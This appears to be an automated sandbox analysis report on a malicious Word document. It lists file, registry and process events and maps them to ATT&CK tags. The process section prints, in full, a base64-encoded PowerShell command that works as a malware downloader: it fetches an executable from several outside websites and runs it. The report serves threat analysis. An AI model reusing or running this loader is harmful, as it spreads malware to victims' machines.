843fad6602a50a9cf09f0d44ad8cf1be1a102ec005d87c9d194b3d166555cf5d

General

Target

Docs_cfb022a24ff5f5e53b3ca65af95cb955.21
Sample

191009-jd8t8z6vwx
SHA256

843fad6602a50a9cf09f0d44ad8cf1be1a102ec005d87c9d194b3d166555cf5d

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	process
13182	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
13182	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
18626	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_cfb022a24ff5f5e53b3ca65af95cb955.21.doc	WINWORD.EXE
22277	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_cfb022a24ff5f5e53b3ca65af95cb955.21.doc	WINWORD.EXE

Drops file in system dir 4 IoCs

Processes:

WINWORD.EXEpowershell.exe

at	description	ioc	process
23587	File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
23587	File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
46816	File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE
49624	File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Modifies registry class 1 TTPs 280 IoCs

persistence

Modify Registry

T1112

Processes:

WINWORD.EXE

at	description	ioc	process
35849	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}	WINWORD.EXE
35849	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0	WINWORD.EXE
35864	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
35864	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\FLAGS	WINWORD.EXE
35864	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\FLAGS\ = "6"	WINWORD.EXE
35864	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0	WINWORD.EXE
35864	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0\win32	WINWORD.EXE
35864	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
35864	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\HELPDIR	WINWORD.EXE
35864	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\FLAGS	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\FLAGS\ = "6"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0\win32	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\HELPDIR	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\TypeLib\{D8C6E966-A50E-41CE-8CFE-DD317FBC5078}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
35864	Key created	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
35864	Set value (str)	\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE

Suspicious use of FindShellTrayWindow

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cfb022a24ff5f5e53b3ca65af95cb955.21.doc"
1⤵
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:1996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=
1⤵
- Drops file in system dir
PID:1392

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-679429269954712200-1156470521832592-143048743511891695301847830918-471517223"
1⤵
PID:1308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1996-0-0x0000000006050000-0x0000000006250000-memory.dmp

Filesize
2.0MB

Download
memory/1996-1-0x0000000006050000-0x0000000006250000-memory.dmp

Filesize
2.0MB

Download
memory/1996-2-0x0000000006050000-0x0000000006250000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads